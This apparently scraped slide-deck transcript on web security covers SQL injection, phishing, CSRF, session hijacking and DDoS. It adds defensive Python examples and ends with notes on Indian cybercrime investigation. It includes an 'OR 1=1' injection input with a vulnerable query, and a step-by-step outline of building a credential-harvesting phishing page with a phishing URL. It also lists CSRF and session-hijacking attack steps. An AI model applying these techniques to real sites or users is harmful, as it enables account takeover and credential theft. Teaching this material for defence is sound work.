  • 95. SQL Injection (SQLi) SQL INJECTION (SQLI) REFERS TO AN INJECTION ATTACK WHEREIN AN ATTACKER CAN EXECUTE MALICIOUS SQL STATEMENTS (ALSO COMMONLY REFERRED TO AS A MALICIOUS PAYLOAD) THAT CONTROL A WEB APPLICATION’S DATABASE SERVER (ALSO COMMONLY REFERRED TO AS A RELATIONAL DATABASE MANAGEMENT SYSTEM – RDBMS).
  • 96. How SQL Injection works  SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’  # Define POST variables  uname = request.POST['username']  passwd = request.POST['password’]  # SQL query vulnerable to SQLi  sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND password=’” + passwd + “’”  # Execute the SQL statement  database.execute(sql)
  • 97. What’s the worst an attacker can do with SQL?  bypass authentication or even impersonate specific users.  allow the complete disclosure of data residing on a database server.  data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.  to delete records from a database  to allow arbitrary execution of operating system commands on the database server
  • 98. What is a SQL Injection Vulnerability?  Non-Technical Explanation  Drive through <route> and <where should the bus stop?> if <when should the bus stop?>.  Drive through route 66 and stop on bus stops if there are people on the bus stops.  Drive through route 66 and do not stop on bus stops and ignore the rest of this form. if there are people on the bus stop.
• 99. What is a SQL Injection Vulnerability?  Technical Explanation  $statement = "SELECT * FROM users WHERE username = 'bob' AND password = 'mysecretpw'";  $statement = "SELECT * FROM users WHERE username = '$user' AND password = '$password'";
  • 100. Different Types of the SQL Injection Vulnerability  Error based SQL Injection  Boolean Based SQL Injection  Time based SQL Injection  Out-of-Band SQL Injection Vulnerability
  • 101. Impacts of the SQL Injection Vulnerability  Add, delete, edit or read content from the database  Read source code from files on the database server  Write files to the database server
• 102. Preventing SQL Injection Vulnerabilities  Server-side scripting languages are not able to determine whether or not the SQL query string is malformed; all they can do is send a string to the database server and wait for the interpreted response.  When developing web applications you should use prepared statements to prevent SQL injection. With prepared statements the query structure and the data are separated, so the SQL server can interpret them without the risk of an attacker changing the structure of the SQL query for malicious purposes.
  • 103. What Can Be Done to Prevent SQL Injection Attacks?  sanitization  validation
  • 104. Sanitization  Sanitization usually involves running any submitted data through a function (such as MySQL's mysql_real_escape_string() function) to ensure that any dangerous characters (like " ' ") are not passed to a SQL query in data.
• 105. Validation  Validation attempts to ensure that the data submitted is in the form that is expected. At the most basic level this includes ensuring that e-mail addresses contain an "@" sign, that only digits are supplied when integer data is expected, and that the length of a piece of data submitted is not longer than the maximum expected length. Two ways:  by blacklisting dangerous or unwanted characters (although hackers can often get around blacklists)  by whitelisting only those characters that are allowed in a given circumstance, which can involve more work on the part of the programmer
• 106. Other ways of prevention  Trust no one  Don't use dynamic SQL when it can be avoided  Firewall  Update and patch  Reduce your attack surface  Use appropriate privileges  Keep your secrets secret  Don't divulge more information than you need to
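The login query from slide 96 beside its prepared-statement fix (slide 102) and a whitelist validator (slide 105), as an added example that is not part of the original slides; it runs against an in-memory SQLite database with one constructed user row, and the `make_db`, `login_*` and `validate_username` names are assumptions of this example.

```python
import re
import sqlite3

# Added example (not from the slides): one constructed user row in SQLite.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('bob', 'mysecretpw')")
    conn.commit()
    return conn

def login_vulnerable(conn, uname, passwd):
    """String concatenation: the user's input becomes part of the SQL structure,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT id FROM users WHERE username='" + uname
           + "' AND password='" + passwd + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_prepared(conn, uname, passwd):
    """Prepared statement: the structure is fixed when the statement is parsed and
    the input is bound as data only, so quotes and comment markers stay inert."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (uname, passwd)).fetchone()
    return row[0] if row else None

# Whitelist validation: only letters, digits and underscore, bounded length.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

def validate_username(uname):
    return USERNAME_RE.fullmatch(uname) is not None
```

Validation rejects the injected username outright, while the prepared statement defends even inputs that a whitelist would allow, which is why the slides recommend both.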
• 108. What is Phishing? Phreaking + Fishing = Phishing {Phreaking = making phone calls for free back in the 70s}. Phishing is the act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
• 111. Phishing Types  Spear Phishing  Clone Phishing  Whaling ___________________________________________________________ Spear Phishing: Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success. This technique is by far the most successful on the internet today, accounting for 91% of attacks.
• 112. Clone Phishing: A type of phishing attack where a legitimate email containing an attachment or link has had its content and recipient address taken and used to create an almost identical, or cloned, email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a re-send of the original or an updated version of the original. Whaling: Several recent phishing attacks have been directed specifically at senior executives and other high-profile targets within businesses, and the term whaling has been coined for these kinds of attacks.
• 113. HERE'S HOW IT'S DONE Step 1: Setting up a web page which looks similar to the original one. Link : http://a0145877.xs ph.ru/
• 114. Step 2: A PHP script which stores credentials to a file is what is required to harvest credentials.
• 115. Step 3: In the HTML page, search for the submit form and change its action to the written PHP script.
• 116. Step 4: Host it on a server and share the link.
• 121. DEFINITION Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. TYPES OF PHISHING • Spear phishing • Clone phishing • Whaling • Filter evasion • Link manipulation • Tabnabbing
• 125. How to protect yourself 1. Be wary of emails asking for confidential information. 2. Make sure you familiarise yourself with a website's privacy policy. 3. Watch out for generic-looking requests for information. 4. Never submit confidential information via forms embedded within email messages. 5. Never use links in an email to connect to a website unless you are absolutely sure they are authentic. Instead, open a new browser window and type the URL directly into the address bar. 6. Make sure you maintain effective software to combat phishing.
• 127. Auto-Generate Domain-Specific Password Passwords are hashed with a secret key together with the website's domain name, so the password submitted to each domain is different.
  • 128. Auto-Generate Domain-Specific Password Due to this mechanism, it becomes really hard for the attacker to get the password.
• 129. Auto-Generate Domain-Specific Password Disadvantages • Practical implementation is quite difficult. • Many banks use multiple domains and sub-domains. • It's a static solution.
• 130. Web Browser's PWD Database Random passwords are generated and stored in the browser. It is more "secure," as the browser will only give the credentials to the right URL. If anything changes in the URL, it won't pass the credentials. Disadvantages • It doesn't work fully with sub-domains. • Even here, passwords are stored in plain text.
• 131. Phishing Scam Alert Add-ons/Extensions The concept is like this: if the browser visits any known fake/phishing URL, the toolbar turns red.
• 132. Phishing Scam Alert Add-ons/Extensions If the site is only suspected of being a phishing or fake site, the toolbar turns yellow.
• 133. 2FA (Two-Factor Authentication) It requires not only a username and password, but also some piece of information that only the user possesses (e.g. a physical token).
• 134. Encrypted Key Exchange Process (Prevents Dictionary Attacks) A series of protocols is implemented for encrypted key exchange. The key is generated by combining it with the shared password, and the process takes place in such a way that the phisher can't guess it. These protocols were awkward to implement and use, and they were also too time-consuming.
• 135. Educating Your People Companies conduct seminars and workshops on ethical hacking and Internet security in order to educate their employees. This can be a quality step towards security awareness; logical awareness has to be raised.
  • 136. CSRF
  • 137. Content  Definition  Attack Process  Screenshots  CounterMeasures  Tools  References
  • 138. Definition  Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.  CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.
• 139. Definition Cont...  With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.  If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth.  If the victim is an administrative account, CSRF can compromise the entire web application.
• 140. Process  Root cause of CSRF  Existing browsers do not check whether a client actually initiates an HTTP request. Diagram (Malicious Website / Browser / Target Website):  1. The browser sends a login request to the target website.  2. The target website returns the login response with cookies.  3. The browser visits the malicious website.  4. The malicious website returns malicious code.  5. The browser sends the forged request, with the cookies, to the target website.
• 141. Screenshot Step 1 − Let us perform a CSRF forgery by embedding JavaScript into an image. The snapshot of the problem is listed below.
• 142. Screenshot Step 2 − Now we need to mock up the transfer into a 1x1 image and make the victim click on it.
• 143. Screenshot Step 3 − Upon submitting the message, the message is displayed as highlighted below.
• 144. Screenshot Step 4 − Now if the victim clicks the following URL, the transfer is executed, which can be seen by intercepting the user action using Burp Suite. We are able to see the transfer by spotting it in the GET message as shown below. Step 5 − Now upon clicking refresh, the lesson completion mark is shown.
• 145. Tool – OWASP CSRF Tester Test your applications for CSRF: - Record and replay transactions - Tune the recorded test case - Run the test case with an exported HTML document. Test case alternatives: - Auto-posting forms - Evil iFrame - IMG tag - XMLHttpRequest - Link
  • 146. Counter Measures  Web application should insert random values, tied to the specified user’s session, into the forms it generates  Web application should re-authenticate every time when users are about to perform a particularly dangerous operation
• 147. Counter Measures Cont.. Safe Methods 1) The GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe" ... so read state-changing parameters from the $_POST superglobal and not from $_GET or $_REQUEST. 2) Try to force the use of your own forms: - On form generation, store a unique token in the user's $_SESSION and in a hidden form field. - On submit, check the token. -- This limits the attack to a single user. -- The attacker would need to obtain the user's valid form AND session token. - Put an expiry on form tokens.
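The per-session form token of slides 146 and 147 (random value stored in the session and in a hidden field, checked on submit, with an expiry and single use), as an added example that is not part of the original slides; the session is a plain dict and the `issue_form_token`, `check_form_token`, `handle_transfer` names and the 600-second TTL are assumptions of this example.

```python
import hmac
import secrets
import time

TOKEN_TTL = 600  # seconds; constructed value for this example

def issue_form_token(session, now=None):
    """Store a fresh random token in the user's session and return it so the
    form generator can place it in a hidden field (slide 147, step 2)."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    session["csrf_issued_at"] = now
    return token

def render_form(session, action="/transfer"):
    """Emit the form with the hidden token; the attacker's forged request cannot
    include it because their page cannot read the victim's form."""
    token = issue_form_token(session)
    return (f'<form method="POST" action="{action}">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="amount"><button>Send</button></form>')

def check_form_token(session, post, now=None):
    """True only if the submitted token matches the session's token and has not
    expired. The token is consumed either way, so it cannot be replayed."""
    now = time.time() if now is None else now
    expected = session.pop("csrf_token", None)
    issued_at = session.pop("csrf_issued_at", 0)
    submitted = post.get("csrf_token", "")
    if not expected or not submitted:
        return False          # forged cross-site request carries no token
    if now - issued_at > TOKEN_TTL:
        return False          # stale form: force the user to reload it
    return hmac.compare_digest(expected, submitted)

def handle_transfer(session, post, now=None):
    """State-changing handler: reads POST data only and rejects missing,
    wrong, expired or reused tokens before doing anything."""
    if not check_form_token(session, post, now):
        return 403, "CSRF check failed"
    return 200, f"transferred {post.get('amount')}"
```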
• 149. What is session hijacking? Session hijacking is the process of exploiting a valid computer session, which involves stealing the victim's cookie.
• 150. What is a cookie? • A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user's browser. • A cookie is sent as a header by the web server to the web browser on the client side. • A cookie is static and is sent back by the browser unchanged every time it accesses the server.
• 151. Types of session hijacking 1) Active: in an active attack, an attacker finds an active session and takes over. 2) Passive: with a passive attack, an attacker hijacks a session, but sits back and watches and records all the traffic that is being sent back and forth.
• 156. Session Hijacking: Steps in Session Hijacking, Types of Session Hijacking, Levels of Session Hijacking, Session Hijacking Tools, Countermeasures
• 157. Steps in Session Hijacking 1. Place yourself between the victim and the target (you must be able to sniff the network) 2. Monitor the flow of packets 3. Predict the sequence number 4. Kill the connection to the victim's machine 5. Take over the session 6. Start injecting packets to the target server
• 158. Types of Session Hijacking There are two types of session hijacking attacks: Active • In an active attack, an attacker finds an active session and takes over. Passive • With a passive attack, an attacker hijacks a session, but sits back and watches and records all the traffic that is being sent back and forth.
• 159. Session Hijacking Levels Session hijacking takes place at two levels: • Network-level hijacking • Application-level hijacking. Network level can be defined as the interception of the packets during transmission between the client and the server in a TCP or UDP session. Application level is about gaining control of an HTTP user session by obtaining the session IDs.
  • 160. Some common tools used for Session Hijacking The following are a few that belong to this category: • Juggernaut • Hunt • TTY Watcher • IP Watcher • T-Sight • Paros HTTP Hijacker
• 161. Counter Measures for Session Hijacking Use encryption Use secure protocols (SSL and HTTPS) Limit incoming connections where possible Minimize remote access Set a time-out so the session expires when inactive Expire the session if the browsing user agent changes Logout functionality
• 162. Counter Measures for Session Hijacking (Cont....) Create a new session ID after successful login Long session IDs Force re-authentication or step-up authentication CAPTCHA Educate the employees Expire the session if the operating system changes Expire the session if the device changes (WebSocket)
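Several of the application-level countermeasures from slides 161 and 162 (long random session IDs, a new ID after login, expiry on inactivity and on a changed user agent, logout), as an added example that is not part of the original slides; `SessionStore` and its methods are assumptions of this example, as is the 900-second idle timeout.

```python
import secrets

IDLE_TIMEOUT = 900  # seconds of inactivity before expiry; constructed value

class SessionStore:
    """Server-side session table keyed by an unguessable ID (constructed demo,
    not any framework's implementation). Times are passed in so it is testable."""

    def __init__(self):
        self._sessions = {}

    def create(self, user_agent, now):
        sid = secrets.token_urlsafe(32)   # long, random session ID (slide 162)
        self._sessions[sid] = {"user": None, "ua": user_agent, "last_seen": now}
        return sid

    def login(self, sid, username, user_agent, now):
        """Authenticate and rotate the ID: the pre-login ID is discarded, so an
        ID an attacker planted or sniffed before login never becomes a
        logged-in session (slide 162, new ID after login)."""
        old = self._sessions.pop(sid, None)
        if old is None:
            return None
        new_sid = self.create(user_agent, now)
        self._sessions[new_sid]["user"] = username
        return new_sid

    def resolve(self, sid, user_agent, now):
        """Return the logged-in user for sid, or None if the session is unknown,
        has been idle past IDLE_TIMEOUT, or is presented from a different user
        agent (slide 161). Failed checks destroy the session rather than
        leaving it for a later attempt."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["last_seen"] > IDLE_TIMEOUT or s["ua"] != user_agent:
            del self._sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def logout(self, sid):
        """Explicit logout functionality: invalidate the ID server-side."""
        return self._sessions.pop(sid, None) is not None
```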
  • 164. What is Distributed Denial of Service?  A denial-of-service attack (DoS attack) is a cyber-attack where the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
• 167. Volume Based Attacks  Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack's goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second (bps).
• 168. Protocol Attacks  Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment such as firewalls and load balancers, and is measured in packets per second.
• 169. Application Layer Attacks  Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Composed of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in requests per second.
• 171. Prevention and Mitigation Strategy  The first thing to do in DDoS mitigation is to identify normal conditions for network traffic by defining "traffic patterns", which is necessary for threat detection and alerting. DDoS mitigation also requires classifying incoming traffic to separate human traffic from human-like bots and hijacked web browsers. This is done by comparing signatures and examining different attributes of the traffic, including IP addresses, cookie variations, HTTP headers, and JavaScript footprints.  One technique is to pass network traffic addressed to a potential target network through high-capacity networks with "traffic scrubbing" filters.
• 173. INVESTIGATION Challenges in the investigation of cyber crime (website crime) Investigation of cyber crimes is different from conventional investigation because:  The incident takes place in a virtual world  It is borderless/transnational  Issues of jurisdiction  The issue of connecting the accused with the machine/computer  Lack of enthusiasm in reporting cyber crime
• 174. The essential requirements for investigation are:  Immediate reporting of breaches.  Adequate tools.  Trained investigators.  Computer-literate witnesses.  Assistance of forensic experts.  Immediate investigation. Common procedure of website crime investigation  WHOIS and domain details: if the domain is active it must have a working email address and payment details; contact the registrar, which can give the domain's IP address, cell number and payment instrument.
• 175.  The email ID used for the sale of the hosting server is important because from it police can obtain the creation IP, alternate email ID, cell number and IP logs.  A law enforcement agency in India can demand information such as IP logs and login credentials of the accused for investigation under Section 91 of CrPC 1973; for detailed information on Section 91 of CrPC 1973 kindly refer to the annexure.  Law enforcement agencies can perform detailed investigation of cyber crime cases through the Internet Protocol Data Record (IPDR) of the network used. The IPDR can be obtained from the ISP of the concerned network. A sample IPDR is shown in the figure.
• 176. Figure: Sample of notice under Section 91 CrPC 1973.
  • 177. Figure : Sample of IPDR
  • 178. Crimes and Laws Relating to Website.  Harassment via fake public profile on social networking site.  Online Hate Community.  Email Account Hacking.  Web Defacement.  Introducing Viruses, Worms, Backdoors, Rootkits, Trojans, Bugs.  Cyber Terrorism.  Phishing and Email Scams.  Theft of Confidential Information.
  • 179. WEBSITE HACKING CASE STUDY  Hacking and defacement of Assam police website.  Hacker hacks into a financial website.  Indian Army website hacked.  ISRO Website Hack.  Bazee.com  E-Bay Account Takeover  Incometaxpune.Com Redirection To Pornographic Content